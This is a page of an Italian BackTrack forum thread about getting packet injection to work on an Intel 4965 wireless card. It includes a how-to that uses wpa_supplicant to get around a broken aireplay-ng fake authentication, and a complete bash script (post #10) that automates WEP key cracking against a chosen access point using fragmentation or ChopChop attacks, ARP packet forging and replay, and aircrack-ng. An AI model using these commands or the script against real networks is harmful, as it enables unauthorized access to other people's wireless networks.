Page 1 of 2 12 LastLast
Results 1 to 10 of 17

Thread: scheda wireless intel chipset iwl4965, problema driver

  1. #1
    Junior Member cancrena's Avatar
    Join Date
    Aug 2009
    Posts
    51

    Default [RISOLTO] scheda wireless intel chipset iwl4965, problema driver

    salve a tutti

    vorrei chiedere un informazione: ho un notebook acer aspire 5920g con scheda wireless intel PRO 4965, e sto cercando il modo per far funzionare corretamente l'iniezione.

    di per se, per connettersi alla rete wireless, va che è una meraviglia, ma appena si tente l'iniezione con aircrack, niente, vuoto totale

    mi sono informato, ho chiesto a google (), forum di bt4 e aircrack, me sembra che l'unico modo sia ricompilare il kernel, patchare i driver e installare il tutto... il problema è che qualsisi guida non è piu recente di gennaio, ed è al massimo per kernel 2.6.26, mentre per la versione 2.6.29.4 non si trova nulla...

    qualcuno di voi ha avuto esperienze con la stessa scheda? avete risolto il problema? sapreste aiutarmi in qualche modo?

    grazie in anticipo!

    [EDIT]
    cortesemente ri/leggi il regolamento del forum, un post è più che sufficente - grazie
    [/EDIT]

  2. #2
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    non so se possono aiutarti ma con una brevissima ricerca sono saltati fuori questi threads

    per ricompilarsi un kernel basta seguire le linee descritte da una guida qualsiasi... ..ad esempio questa, tenendo conto della patch di cui hai bisogno.

  3. #3
    Junior Member cancrena's Avatar
    Join Date
    Aug 2009
    Posts
    51

    Default [RISOLTO] sheda wireless intel chipset iwl4965, problema driver

    grazie per i link! spero di riuscire a concludere qualcosa

    mi scuso per il doppio post, è stato un "ritrasmetti informazioni" non voluto

    p.s. il mistero è sempre piu fitto, dopo che oggi ho eseguito un test di injection (gerix-wifi-cracker) con risultato 100% injected, per la prima volta da quando ho BT4 ... e lo stesso per la fake auth, per la prima volta eseguita con successo...

    solo che non sono riuscito a replicare l'esperimento...

    EDIT - RISOLTO

  4. #4
    Junior Member cancrena's Avatar
    Join Date
    Aug 2009
    Posts
    51

    Exclamation [RISOLTO] sheda wireless intel chipset iwl4965, problema driver

    mi scuso per un altro doppio post, ma la faccenda è stata risolta ed ho scritto un piccolo how-to per gli interessati...

    per abilitare l'iniezione con la scheda intel/PRO wireless4965agn (detta iwl4965), basta installare questo pacchetto driver

    hxxp://orbit-lab.org/kernel/compat-wireless-2.6-stable/v2.6.31/compat-wireless-2.6.31-rc4.tar.bz2

    le istruzioni per l'install (nulla piu di un normale compile) si trovano alla pagina hxxp://orbit-lab.org/kernel/compat-wireless-2.6-stable/

    il kernel 2.6.29.4 di backtrack 4 non ha bisogno di modifiche in quanto è gia configurato in maniera ottimale, mentre i driver non hanno piu bisogno di patch poichè la/le comprendono già (le guide che si posso reperire, per lo piu sui forum e sulla wiki di aircrack-ng, sono ormai datate, utilizzano versioni dei driver troppo vecchie). il risultato dopo install e reboot è:

    Code:
    Interface       Chipset         Driver
    
    wlan0           Intel 4965/5xxx iwlagn - [phy0]
                                    (monitor mode enabled on mon0)
    Code:
    00:07:17  Trying broadcast probe requests...
    00:07:17  Injection is working!
    00:07:19  Found 1 AP
    
    00:07:19  Trying directed probe requests...
    00:07:19  00:11:**:**:**:60 - channel: 3 - 'Wireless'
    00:07:21  Ping (min/avg/max): 1.365ms/50.210ms/60.547ms Power: -61.27
    00:07:21  30/30: 100%
    ATTENZIONE:

    rimane una questione buggata: la fakeauth!
    la fakeauth eseguita con aireplay-ng non è funzionante, non da risultati, e in piu crea problemi con i driver, con il risultato di compromettere l'iniezione, che non funzionerà piu fino al prossimo reboot.

    SOLUZIONE:

    per fortuna c'è un modo per aggirare il problema: wpa_supplicant, che permette una fakeauth, per poi continuare l'attacco con aireplay.

    come utilizzare wpa_supplicant:

    creare prima di tutto un file di configurazione così strutturato:

    Code:
    network={
            ssid="nome della rete wireless con cui eseguire la fakeauth"
            key_mgmt=NONE
            wep_key0="fakeauth"
    }
    e salvatelo dove volete e col nome che preferite, l'importante è che l'estensione sia .conf (nel mio caso /usr/wpa_supplicant.conf)

    LA FAKE AUTHENTICATION CON wpa_supplicant VA ESEGUITA NON IN MONITOR MODE
    prima dovrete eseguire la fakeauth e poi dilettarvi con airmon e aireplay
    ovviamente per sapere il nome delle reti wireless nei dintorni potete avviare airmon-ng e airodump-ng, per poi disabilitare l'interfaccia monitor con

    Code:
    sudo airmon-ng stop mon0
    sudo airmon-ng stop wlan0
    sudo ifconfig wlan0 up
    in questo modo sarete tornati alla normale interfaccia.
    eseguite da shell il seguente comando:

    Code:
    sudo wpa_spplicant -c/usr/wpa_supplicant.conf -Dwext -iwlan0 -dd
    -non ci sono spazi dopo gli indicatori delle opzioni
    -l'opzione -c indica il luogo e il nome del file di configurazione
    -l'opzione -D indica i driver da utilizzare, wext è la normale estensione wireless del kernel
    -l'opzione -i indica l'interfaccia wireless

    se la fake authentication sarà andata a buon fine, vedrete queste linee:

    Code:
    State: ASSOCIATED -> COMPLETED
    CTRL-EVENT-CONNECTED - Connection to 11:22:33:44:55:66 completed (auth) [id=0 id_str=]
    è importante non chiudere la shell di wpa_supplicant, altrimenti l'associazione terminerà all'istante

    a questo punto, potete procedere come di norma con la suite aircrack, quindi

    settare un'interfaccia monitor con airmon-ng
    iniziare lo scanning con airodump-ng
    iniziare l'attacco con aireplay-ng ricordarsi di evitare l'attacco fakeauth
    decifrare con aircrack-ng


    questo è tutto, spero di essere stato utile a qualcuno
    la parte relativa all'iniezione l'ho risolta da me, per caso
    la parte relativa a wpa_supplicant è una libera interpretazione e traduzione della parte finale della guida a quest'indirizzo:
    hxxp://forum.aircrack-ng.org/index.php?topic=3954.0

  5. #5
    Moderator
    Join Date
    Aug 2007
    Posts
    1,053

    Default

    ok, thanx per aver condiviso la tua soluzione, chissà che all' apertura del wiki ne faremo tesoro.

  6. #6
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    7

    Default

    io non capisco un paio di cose:

    quando mi associo con wpa_supplicant oltre a scrivermi STATE->CONNECTED mi scrive altre 5-6 righe (se vuoi le posto)

    dopo aver fatto questo cosa devo fare ?? hai scritto di avviare airmon, ma wlan0 la devo downare o lasciarli li ??

    cioe faccio :


    ifconfig wlan0 down
    airmon-ng start wlan0
    oppure solo :

    airmon-ng start wlan0
    ps: io non ho messo nessuna patch pero' la schremata di airmon e uguale a quella k hai postato te...

  7. #7
    Junior Member cancrena's Avatar
    Join Date
    Aug 2009
    Posts
    51

    Default

    le varie righe in piu di wpa_supplicant lasciale pure stare tranquillo
    se ti dice connected, sei apposto

    ricordati di NON chiudere la shell di wpa_supplicant o perderai l'associazione

    appena hai eseguito la fakeauth, apri una nuova shell e fai

    Code:
    airmon-ng start wlan0
    senza mettere down l'interfaccia... se vedi che ogni tanto wpa_supplicant si disconnette, ti basta rieseguirlo uguale uguale ed è tutto ok.

    la disconnessione di wpa_supplicant è un problema comune a molti, e nella sezione inglese di questo forum puoi trovare alcuni script che ti aiutano ad ovviare al problema
    il prezzo da pagare per non essere gelatinosi ed informi è un estinzione alquanto precoce

  8. #8
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    6

    Default

    CANCRENA un aiuto, ho istallato BT4 PREFINAL e la faccio partire con WMmanager. mi daresti l'input per iniziare a craccare la mia WEP? io riuscivo con la intel BG2200 ma con questa ho serie difficolta'!!mi aiuti per favore?? mi serve proprio i primi comandi iniziali graziee

  9. #9
    Junior Member cancrena's Avatar
    Join Date
    Aug 2009
    Posts
    51

    Default

    per iniziare, le procedure di aircrack-ng sono sempre le stesse:
    metti il monitor mode
    fai partire airodump per vedere le reti nell'area
    ti segni i dati e stoppi il monitor mode
    configuri wpa_supplicant come descritto nella guida
    setti nuovamente il monitor mode sul canale desiderato, e da qui in poi è tutto uguale a sempre, ma ricorda di non usare l'attacco 1 di aireplay visto che è lui a causare tutti i problemi!
    il prezzo da pagare per non essere gelatinosi ed informi è un estinzione alquanto precoce

  10. #10
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    7

    Default

    Se a qualcuno puo' interessare ( soprattutto i possessori di acer 5920 ) ho fatto uno script che fa tutto lui , voi dovete solo seguirlo :

    #!/bin/bash

    echo "[+] Chiudo interfaccia wlan0"
    ifconfig wlan0 down
    echo "[+] Aumento la potenza (1M)"
    iwconfig wlan0 rate 1M
    echo "[+] Starto l'interfaccia mon0"
    airmon-ng start wlan0
    echo "[+] Apro airodump"
    airodump-ng mon0
    echo "[+] Chiudo l'interfaccia mon0"
    airmon-ng stop mon0
    airmon-ng stop wlan0
    echo "[+] Attivo wlan0"
    ifconfig wlan0 up

    while [ "$stato" != "y" ]
    do

    echo "[+] Inserisci il nome della rete "
    vi /root/Wifi/wpaS.conf ;konsole -T "wpaSupplicant" -e wpa_supplicant -c/root/Wifi/wpaS.conf -Dwext -iwlan0 -dd &
    echo "[+] Ti sei connesso[y]?"
    read stato
    done

    echo -n "[+] Seleziona canale monitor (1-14): "
    read channel
    echo -n "[+] Seleziona BSSID: "
    read bssid
    echo -n "[+] Seleziona dove vuoi salvare i file cap: "
    read files
    echo "[+] Avvio l'interfaccia mon0 sul canale $channel"
    airmon-ng start wlan0 $channel
    konsole -T "Monitor" -e airodump-ng -c $channel --bssid $bssid -w $files mon0 &
    while [ "$again" != "y" ]
    do
    while [ "$packets" != "y" ]
    do

    echo -n "[+] Vuoi usare Fragmentation[1] o ChopChop[2]: "
    read scelta
    if [ "$scelta" = 1 ]
    then
    konsole -T "Fragmentation" -e aireplay-ng -5 -b $bssid -h MIOBSSID mon0
    else
    konsole -T "ChopChop" -e aireplay-ng -4 -h MIOBSSID-b $bssid mon0
    fi
    echo -n "[+] Hai catturato il pacchetto[y]???: "
    read packets
    done

    echo "[+] Creo il pacchetto "
    packetforge-ng -0 -a $bssid -h MIOBSSID -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w pass/arp-request
    echo "[+] Spedisco i pacchetti "
    konsole -T "Mitraglia" -e aireplay-ng -2 -r pass/arp-request mon0 &
    echo -n "[+] Ha funzionato[y]??? : "
    read again
    packets="n"

    done
    echo -n "[+] Cerco la password "
    aircrack-ng -z -b $bssid $files*.cap
    dovete adattarlo mettendo il vostro bssid , e modificare il path di wpa supplicant.

    quando fate l'attacco fragmentation , se si chiude da solo il terminale vuol dire che ha creato il pacchetto , la stessa cosa NON vale x il chopChop...

    sono accettati qualsiasi tipo di commenti/suggerimenti

    Ciaoooooo

    Ale

    ps Ovviamente senza la guida di cancrena tutto cio' non sarebbe stato possibile

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •